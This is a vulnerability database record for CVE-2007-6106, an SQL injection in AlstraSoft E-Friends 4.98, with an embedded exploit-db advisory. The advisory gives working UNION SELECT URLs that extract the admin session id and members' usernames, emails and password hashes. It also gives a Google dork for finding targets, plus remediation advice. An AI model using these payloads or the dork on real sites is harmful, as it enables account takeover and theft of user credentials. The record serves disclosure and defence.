ID CVE-2007-6106 Type cve Reporter NVD Modified 2018-10-15T17:49:46
Description
SQL injection vulnerability in index.php in AlstraSoft E-Friends 4.98 and earlier allows remote attackers to execute arbitrary SQL commands via the seid parameter in a viewevent action.
{"osvdb": [{"lastseen": "2017-04-28T13:20:34", "bulletinFamily": "software", "description": "## Vulnerability Description\nAlstraSoft E-Friends contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'index.php' script not properly sanitizing user-supplied input to the 'seid' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nhttp://[target]/index.php?mode=events&act=viewevent&seid=-1%20union%20select%201,2,3,sess_id,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20admin--\n## References:\n[Secunia Advisory ID:27766](https://secuniaresearch.flexerasoftware.com/advisories/27766/)\nOther Advisory URL: http://advisories.echo.or.id/adv/adv85-K-159-2007.txt\nISS X-Force ID: 38599\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4641\nFrSIRT Advisory: ADV-2007-3964\n[CVE-2007-6106](https://vulners.com/cve/CVE-2007-6106)\nBugtraq ID: 26519\n", "modified": "2007-11-21T00:00:00", "published": "2007-11-21T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:38806", "id": "OSVDB:38806", "title": "AlstraSoft E-Friends index.php seid Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T21:24:57", "bulletinFamily": "exploit", "description": "alstrasoft E-Friends <= 4.98 (seid) Multiple SQL Injection Vulnerabilities. CVE-2007-6106. Webapps exploit for php platform", "modified": "2007-11-21T00:00:00", "published": "2007-11-21T00:00:00", "id": "EDB-ID:4641", "href": "https://www.exploit-db.com/exploits/4641/", "type": "exploitdb", "title": "alstrasoft E-Friends <= 4.98 seid Multiple SQL Injection Vulnerabilities", "sourceData": "____________________ ___ ___ ________\n\\_ _____/\\_ ___ \\ / | \\\\_____ \\ \n | __)_ / \\ \\// ~ \\/ | \\\n | \\\\ \\___\\ Y / | \\\n/_______ / \\______ /\\___|_ /\\_______ /\n \\/ \\/ \\/ \\/\n\n .OR.ID\nECHO_ADV_85$2007\n\n-----------------------------------------------------------------------------------------\n[ECHO_ADV_85$2007] alstrasoft E-Friends <= 4.98 (seid) Multiple Remote SQL Injection Vulnerabilities\n-----------------------------------------------------------------------------------------\n\nAuthor : M.Hasran Addahroni\nDate : November, 15 th 2007\nLocation : Australia, Sydney\nWeb : http://advisories.echo.or.id/adv/adv85-K-159-2007.txt\nCritical Lvl : Critical\nImpact : System access Where : From Remote\n---------------------------------------------------------------------------\n\nAffected software description:\n~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nApplication : E-Friends \nversion : <= 4.98\nVendor : http://www.alstrasoft.com/efriends.htm\nDescription :\n\nE-Friends is an online social networking script that allows you to start your own profitable community just like Friendster and MySpace social networking site plus the ability to offer paid membership subscriptions. E-Friends allow members to connect to people in their personal networks and make friends, match making, dating, blogging and join groups and events. Features include email importer, messaging system, classifieds, join groups, forums, affiliate program integrated, online chat, personal blog, calendar, custom profile URL, friends search, invite friends, hotornot image ranking, advance admin control panel, upload photos and many more.\n\n---------------------------------------------------------------------------\n\nVulnerability:\n~~~~~~~~~~~~~\n\nInput passed to the \"seid\" parameter in events modules is not properly verified before being used to sql query.\nThis can be exploited thru the browser and get the hash md5 password from members and retrieve admin session id.\nSuccessful exploitation requires that \"magic_quotes\" is off.\n\n\nPoc/Exploit:\n~~~~~~~~~\n1.Retrieve Admin SessionID :\n\nhttp://target.com/index.php?mode=events&act=viewevent&seid=-1%20union%20select%201,2,3,sess_id,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20admin--\n\nUse the SessionID in this URL:\nhttp://target.com/admin.php?mode=users_manager&adsess=SESSION_ID\n\n2.Get Members's Username and md5 hash:\nhttp://target.org/index.php?mode=events&act=viewevent&seid=-1%20union%20select%201,2,3,concat(mem_id,0x3a,username,0x3a,email,0x3a,password,0x3a,fname),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20members--\n\n\n\nDork:\n~~~~\nGoogle : \"JOIN OUR SITE Today. It's FREE!\"\n\n\nSolution:\n~~~~~~\n\n- Edit the source code to ensure that input is properly verified.\n- Turn on magic_quotes in php.ini\n \n\nTimeline:\n~~~~~~~~\n\n- 15 -11 - 2007 bug found\n- 21 -11 - 2007 vendor contacted\n- 22 -11 - 2007 publish advisory\n---------------------------------------------------------------------------\n\nShoutz:\n~~~~\n~ ping - my dearest wife, 'zizou' zautha - my lovely son, for all the luv, the tears n the breath\n~ y3dips,the_day,m0by,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v, az01,negative,the_hydra,neng chika, str0ke\n~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw\n~ SinChan,h4ntu,cow_1seng,sakitjiwa, m_beben, rizal, cR4SH3R, madkid, kuntua, stev_manado, nofry,ketut,x16\n~ newbie_hacker@yahoogroups.com\n~ #aikmel #e-c-h-o @irc.dal.net\n\n---------------------------------------------------------------------------\nContact:\n~~~~~\n\n K-159 || echo|staff || eufrato[at]gmail[dot]com\n Homepage: http://k-159.echo.or.id/\n\n-------------------------------- [ EOF ] ----------------------------------\n\n# milw0rm.com [2007-11-21]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/4641/"}]}